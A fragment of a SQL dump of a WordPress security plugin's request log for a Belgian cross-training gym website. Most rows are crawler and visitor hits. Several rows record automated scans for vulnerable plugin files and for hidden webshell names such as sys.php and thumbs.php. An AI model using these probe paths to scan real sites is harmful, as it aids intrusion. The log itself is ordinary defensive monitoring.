(74132, 1496248940.301252, 1539837611, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/mobile-app-builder-by-wappress/server/images.php', '', ''),
(74133, 1496248941.145272, 1539837611, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php', '', ''),
(74134, 1496248941.946501, 1539837611, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/cysteme-finder/php/connector.php?wphome=./', '', ''),
(74135, 1496253770.779953, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74136, 1496253771.578240, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74137, 1496253772.000654, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74138, 1496253772.436106, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74139, 1496253772.863685, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74140, 1496253773.280495, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74141, 1496253773.929790, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74142, 1496253774.406508, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74143, 1496253774.966645, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74144, 1496253775.559636, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74145, 1496253776.044305, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74146, 1496254147.987073, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74147, 1496259027.852426, 1570674724, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74148, 1496261994.240342, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/languages/themes/sys.php', 'http://crosstrainingcenter.be/wp-content/languages/themes/sys.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74149, 1496261994.242284, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/network/system.php', 'http://crosstrainingcenter.be/wp-admin/network/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74150, 1496261994.293857, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/user/system.php', 'http://crosstrainingcenter.be/wp-admin/user/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74151, 1496261994.296120, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/profoblog20/functions/colorpicker/thumbs.php', 'http://crosstrainingcenter.be/wp-content/themes/profoblog20/functions/colorpicker/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74152, 1496262020.164222, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/ini.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/ini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74153, 1496262021.762803, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/ini.php', 'http://crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/ini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74154, 1496262021.917477, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/core.php', 'http://crosstrainingcenter.be/wp-includes/core.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74155, 1496262021.935052, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/jcrop/sys.php', 'http://crosstrainingcenter.be/wp-includes/js/jcrop/sys.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74156, 1496262021.937289, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/fonts/system.php', 'http://crosstrainingcenter.be/wp-includes/fonts/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74157, 1496262021.963986, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/thumbs.php', 'http://crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74158, 1496262022.043653, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/certificates/system.php', 'http://crosstrainingcenter.be/wp-includes/certificates/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74159, 1496262022.055820, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/profoblog20/js/helpers/thumbs.php', 'http://crosstrainingcenter.be/wp-content/themes/profoblog20/js/helpers/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74160, 1496262022.068233, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/thumbs.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74161, 1496262022.073166, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ini.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(74162, 1496262022.075990, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/crop/sys.php', 'http://crosstrainingcenter.be/wp-includes/js/crop/sys.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74163, 1496262022.079374, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/system.php', 'http://crosstrainingcenter.be/wp-includes/js/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74164, 1496262022.092414, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/img/main.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/default/img/main.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74165, 1496262022.096705, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyfourteen/genericons/font/thumbs.php', 'http://crosstrainingcenter.be/wp-content/themes/twentyfourteen/genericons/font/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74166, 1496262022.109468, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/thumbs.php', 'http://crosstrainingcenter.be/wp-content/themes/profoblog20/functions/jquery-ui/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74167, 1496262052.432427, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/theme-compat/system.php', 'http://crosstrainingcenter.be/wp-includes/theme-compat/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74168, 1496262052.520567, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/simplepie/system.php', 'http://crosstrainingcenter.be/wp-includes/simplepie/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74169, 1496262052.690479, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/thumbs.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74170, 1496262052.840332, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/thumbs.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74171, 1496262052.887695, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ini.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74172, 1496262052.908418, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/thumbs.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74173, 1496262052.917128, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/thumbs.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/thumbs.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74174, 1496262052.919573, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/ini.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/ini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74175, 1496262052.930301, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/main.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/main.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74176, 1496262052.957251, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/class.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/class.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74177, 1496262052.978838, 844599434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/text/system.php', 'http://crosstrainingcenter.be/wp-includes/text/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74178, 1496266102.947510, 1753435673, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74179, 1496266107.721566, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74180, 1496266109.543141, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74181, 1496266112.527323, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74182, 1496266117.873738, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74183, 1496266127.032139, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74184, 1496266131.913722, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74185, 1496266136.663923, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74186, 1496266142.291752, 1753435673, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(74187, 1496275673.691270, 3024883468, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74188, 1496275808.207186, 3475901896, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74189, 1496282950.490387, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74190, 1496288671.375585, 2637637417, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74191, 1496290753.479623, 1314247995, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/downloads-manager/readme.txt', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0)'),
(74192, 1496291371.289510, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74193, 1496295888.201231, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74194, 1496295888.730438, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74195, 1496295889.215753, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74196, 1496295889.824922, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74197, 1496295890.276919, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74198, 1496295890.768452, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74199, 1496295891.260600, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74200, 1496295891.672023, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74201, 1496295892.115285, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74202, 1496295892.545086, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74203, 1496295892.960854, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74204, 1496299171.471450, 1053970255, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36'),
(74205, 1496300925.443870, 3475901750, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74206, 1496300929.485261, 3475901750, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74207, 1496300986.307138, 3475901750, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74208, 1496303513.285050, 2731721828, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74209, 1496303516.649333, 2731721828, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(74210, 1496310622.778561, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74211, 1496314489.742058, 2303380418, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74212, 1496318204.065213, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74213, 1496318204.573862, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74214, 1496318204.993765, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74215, 1496318205.396544, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74216, 1496318208.775975, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74217, 1496318209.265157, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74218, 1496318209.674668, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74219, 1496318210.194266, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74220, 1496318210.714682, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74221, 1496318211.157614, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74222, 1496318211.638320, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74223, 1496318212.102548, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74224, 1496318212.591297, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74225, 1496318213.087287, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74226, 1496319027.362726, 3475901896, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74227, 1496319958.229924, 3657085691, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74228, 1496330544.120381, 3625177169, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(74229, 1496331294.074809, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74230, 1496331294.534572, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74231, 1496331294.939589, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74232, 1496331295.364159, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74233, 1496331295.862011, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74234, 1496331296.263777, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74235, 1496331296.673501, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74236, 1496331297.110101, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74237, 1496331297.513999, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74238, 1496331297.921502, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
